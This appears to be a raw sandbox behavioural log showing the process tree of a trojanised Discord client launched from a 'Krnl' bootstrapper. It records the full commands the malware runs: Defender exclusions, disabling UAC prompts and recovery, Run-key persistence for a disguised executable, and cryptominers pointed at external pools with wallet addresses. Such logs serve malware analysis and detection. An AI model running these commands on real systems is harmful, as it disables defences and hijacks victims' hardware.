C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord /d "C:\Users\Admin\AppData\Local\Discord\Update.exe --processStart Discord.exe" /f4⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
-
C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"C:\Users\Admin\Downloads\Krnl\KrnlBootStrapper.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\Update.exe"C:\Users\Admin\AppData\Local\Discord\Update.exe" --processStart Discord.exe2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exeC:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\discord\Crashpad --url=https://sentry.io/api/146342/minidump/?sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord Inc." --annotation=_productName=Discord --annotation=_version=1.0.9008 --annotation=prod=Electron --annotation=ver=13.6.6 --initial-client-data=0x47c,0x480,0x484,0x478,0x488,0x7a83850,0x7a83860,0x7a8386c4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1756 /prefetch:24⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2276 /prefetch:14⤵
- Executes dropped EXE
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:84⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1 --enable-node-leakage-in-renderers4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /q /d /s /c "C:\Program^ Files\NVIDIA^ Corporation\NVSMI\nvidia-smi.exe"5⤵
-
-
C:\Windows\SysWOW64\net.exenet session5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" /t REG_SZ /d "RUNASADMIN" /f"5⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /v "C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" /t REG_SZ /d "RUNASADMIN" /f6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powercfg /hibernate off"5⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"5⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reagentc.exe /disable"5⤵
-
C:\Windows\SysWOW64\ReAgentc.exereagentc.exe /disable6⤵
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:LOCALAPPDATA -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:LOCALAPPDATA -Force6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:APPDATA -Force"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im SoundServices.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SoundServices.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im dllhost.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dllhost.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im taskhostw.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhostw.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dasHost" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Microsoft\MicrosoftAudio.exe""5⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dasHost" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Microsoft\MicrosoftAudio.exe"6⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\Espeon.zip -DestinationPath C:\Users\Admin\AppData\Roaming\Microsoft -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\Espeon.zip -DestinationPath C:\Users\Admin\AppData\Roaming\Microsoft -Force6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\ErrorReport.exe -pool us-eth.2miners.com:2020 -wal 0x07D13CF48739BCb0b227f7A15095B2f3E8d9b107.PM_ID_Admin -gpow 75%"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\ErrorReport.exe -pool us-eth.2miners.com:2020 -wal 0x07D13CF48739BCb0b227f7A15095B2f3E8d9b107.PM_ID_Admin -gpow 75%"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\XR.zip -DestinationPath C:\Users\Admin\AppData\Local\Microsoft -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\XR.zip -DestinationPath C:\Users\Admin\AppData\Local\Microsoft -Force6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\XR.exe -o xmrpool.eu:3333 --cpu-priority 4 --algo rx/0 -p x -u 45vPYdUaSyahwjRdi1C3UoBhJ2CLzUjaDZwRp94G95VYheZMBZfic6KXJsECKQXv9VVqQNP6v7uHMgfopx8QDEJLPqd6i9R+Admin -t 2"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im SoundServices.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SoundServices.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im dllhost.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dllhost.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im taskhostw.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhostw.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\reg.exe ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dasHost" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Microsoft\MicrosoftAudio.exe""5⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dasHost" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Microsoft\MicrosoftAudio.exe"6⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\Espeon.zip -DestinationPath C:\Users\Admin\AppData\Roaming\Microsoft -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\Espeon.zip -DestinationPath C:\Users\Admin\AppData\Roaming\Microsoft -Force6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\RuntimeService.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\ErrorReport.exe -pool us-eth.2miners.com:2020 -wal 0x07D13CF48739BCb0b227f7A15095B2f3E8d9b107.PM_ID_Admin -gpow 75%"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Microsoft\XR.exe -o xmrpool.eu:3333 --cpu-priority 4 --algo rx/0 -p x -u 45vPYdUaSyahwjRdi1C3UoBhJ2CLzUjaDZwRp94G95VYheZMBZfic6KXJsECKQXv9VVqQNP6v7uHMgfopx8QDEJLPqd6i9R+Admin -t 2"5⤵
-
C:\Users\Admin\AppData\Local\Microsoft\XR.exeC:\Users\Admin\AppData\Local\Microsoft\XR.exe -o xmrpool.eu:3333 --cpu-priority 4 --algo rx/0 -p x -u 45vPYdUaSyahwjRdi1C3UoBhJ2CLzUjaDZwRp94G95VYheZMBZfic6KXJsECKQXv9VVqQNP6v7uHMgfopx8QDEJLPqd6i9R+Admin -t 26⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\XR.zip -DestinationPath C:\Users\Admin\AppData\Local\Microsoft -Force"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell expand-archive -LiteralPath C:\Users\Admin\AppData\Local\Temp\XR.zip -DestinationPath C:\Users\Admin\AppData\Local\Microsoft -Force6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im SoundServices.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SoundServices.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im dllhost.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dllhost.exe6⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /f /im taskhostw.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhostw.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3640 /prefetch:84⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3576 /prefetch:84⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord4⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord /d "C:\Users\Admin\AppData\Local\Discord\Update.exe --processStart Discord.exe" /f4⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1692,5725274141196905659,3828758034457182355,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2504 /prefetch:24⤵
- Executes dropped EXE
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Espeon\" -spe -an -ai#7zMap28334:74:7zEvent299492⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Downloads\Espeon\MicrosoftAudio.exe"C:\Users\Admin\Downloads\Espeon\MicrosoftAudio.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2844 -s 28003⤵
- Program crash
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2844 -s 29523⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBEBroker.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBEBroker.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Discord\Update.exe"C:\Users\Admin\AppData\Local\Discord\Update.exe" --processStart Discord.exe2⤵
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"3⤵
- Checks computer location settings
-
